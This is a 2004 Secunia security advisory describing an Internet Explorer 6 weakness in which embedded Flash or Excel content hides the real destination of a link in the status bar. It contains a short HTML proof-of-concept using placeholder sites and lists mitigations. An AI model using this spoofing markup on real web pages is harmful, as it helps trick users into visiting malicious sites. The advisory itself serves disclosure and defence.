|
Internet Explorer Flash/Excel Content Status Bar Spoofing Weakness
|
|
|
|
|
Secunia Advisory:
|
SA13156
|
|
|
Release Date:
|
2004-11-10
|
|
Last Update:
|
2004-11-17
|
|
|
Critical:
|
Not critical
|
|
Impact:
|
Security Bypass
|
|
Where:
|
From remote
|
|
Solution Status:
|
Unpatched
|
|
| Software: | Microsoft Internet Explorer 6.x
|
|
|
This advisory is currently marked as unpatched!
- Companies can be alerted when a patch is released! |
|
|
Description:
Roozbeh Afrasiabi has discovered a weakness in Internet Explorer, which can be exploited by malicious people to trick users into visiting a malicious website by obfuscating URLs displayed in the status bar.
This weakness is a variant of:
SA13015
Example:
<A HREF=http://[trusted_site] >
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0"
WIDTH="300" HEIGHT="50" id="link" ALIGN="">
<param NAME=movie VALUE="[malicous_flash]">
<param NAME=quality VALUE=high >
<param NAME=bgcolor VALUE=#FFFFFF>
<param NAME=menu VALU=FALSE>
<embed src="[malicious_flash]" quality=high bgcolor=#FFFFFF WIDTH="300" HEIGHT="50" NAME="link" ALIGN=""
TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer">
</embed>
The problem has been confirmed in version 6.0 on a system running Windows XP with SP2 installed. Other versions may also be affected.
It is also possible to use an embedded Excel spreadsheet, as demonstrated by http-equiv.
Solution:
Never follow links from untrusted sources.
Disable the "Run ActiveX controls and plug-ins" setting for all but trusted sites.
Provided and/or discovered by:
Discovered by:
Roozbeh Afrasiabi
Further information provided by:
http-equiv
Changelog:
2004-11-17: Added further information provided by http-equiv. Updated "Description" section.
Other References:
SA13015:
http://secunia.com/advisories/13015/
|
|
|
|
|
Please note: The information that this Secunia Advisory is based on comes from a third party unless stated otherwise.
Secunia collects, validates, and verifies all vulnerability reports issued by security research groups, vendors, and others.
|
|
|
|
131 Related Secunia Security Advisories, displaying 10
|
|
|
1. Internet Explorer 6 Window "location" Handling Vulnerability
|
|
2. Internet Explorer "substringData()" Memory Corruption Vulnerability
|
|
3. Internet Explorer "Print Table of Links" Cross-Zone Scripting
|
|
4. Internet Explorer HTTP Request Smuggling/Splitting Vulnerabilities
|
|
5. Internet Explorer FTP Command Injection Vulnerability
|
|
6. Microsoft Internet Explorer Multiple Vulnerabilities
|
|
7. Internet Explorer Multiple Code Execution Vulnerabilities
|
|
8. Microsoft Web Proxy Auto-Discovery Feature Security Issue
|
|
9. Internet Explorer Data Stream Handling Vulnerability
|
|
10. Internet Explorer Unspecified Address Bar Spoofing Vulnerability
|
Show all related advisories
|
|
|
Send Feedback to Secunia
|
|
If you have new information regarding this Secunia advisory or a product in our database, please send it to us using either our web form or email us at vuln@secunia.com.
Ideas, suggestions, and other feedback are most welcome.
|
|
|
|
